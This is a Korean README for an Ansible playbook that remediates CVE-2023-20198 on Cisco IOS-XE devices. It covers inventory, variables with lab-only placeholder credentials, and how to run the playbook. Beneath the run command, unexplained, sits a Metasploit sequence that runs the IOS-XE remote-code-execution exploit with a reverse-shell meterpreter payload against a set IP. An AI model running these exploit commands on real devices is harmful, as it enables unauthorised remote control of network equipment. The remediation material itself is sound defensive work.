
CVE-2023-20198에 취약한 IOS-XE 장치를 만드는 조건을 확인하고 수정합니다.
이 리포지토리는 특정 Cisco 장치에서 발견된 CVE-2023-20198 취약점을 해결하기 위한 Ansible 플레이북을 포함합니다.
다음 작업을 수행합니다:
CVE-2023-20198-Fix/
│
├── ansible.cfg # Ansible 설정 파일
├── group_vars/ # 호스트 그룹별 변수 디렉터리
│ └── iosxe_devices.yml # IOS-XE 장치용 변수 정의
├── inventory.yml # 호스트 목록, 대상 장치 포함
└── remediate.yml # CVE-2023-20198 해결을 위한 플레이북
제어 머신에 Ansible이 설치되어 있어야 합니다. 이 플레이북은 Ansible 2.9 이상용으로 작성되었습니다.
Ansible 구성: 환경 설정에 맞게 ansible.cfg를 편집하십시오.
IOS-XE 장치의 호스트 세부 정보를 inventory.yml에 업데이트하십시오.
group_vars/iosxe_devices.yml에 필요한 변수를 정의하십시오. 여기에는 연결 설정 및 자격 증명과 같은 IOS-XE 장치의 공통 설정이 포함되어야 합니다.
인벤토리에 새 IOS-XE 장치를 추가하려면 inventory.yml 파일을 편집하고 적절한 그룹 아래에 새 호스트를 추가하십시오:
iosxe_devices:
hosts:
vulnerable_router01:
ansible_host: 192.168.1.3
# ... 기타 필요한 변수
new_router01을 장치의 호스트 이름으로, ansible_* 변수를 장치의 실제 값으로 바꾸십시오.
IOS-XE 장치 그룹의 자격 증명이나 기타 설정을 업데이트해야 하는 경우 group_vars/iosxe_devices.yml 파일을 편집하십시오:
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password # 실습용만 사용, 자격 증명은 책임감 있게 저장하십시오!
ansible_become_method: enable
ansible_become_password: admin_password # 실습용만 사용, 자격 증명은 책임감 있게 저장하십시오!
# ... 기타 변수
플레이북을 실행하려면 다음 명령을 사용하십시오:
ansible-playbook remediate.yml -i inventory.yml
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242 # 대상 IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit



프로덕션 환경에서 플레이북을 실행하기 전에 항상 통제된 환경에서 변경 사항을 테스트하십시오.
비밀번호 및 비밀 키와 같은 민감한 데이터는 Ansible Vault를 사용하여 저장하십시오. 인벤토리나 group_vars 파일에 평문 자격 증명을 저장하지 마십시오.
추가 보안 조치 및 모범 사례는 Ansible 공식 문서를 참조하십시오.
모든 플레이스홀더 값을 환경에 해당하는 실제 데이터로 교체하십시오. 이 README는 인벤토리, 변수, 플레이북 실행과 같은 Ansible 개념에 대한 기본적인 친숙함을 가정합니다.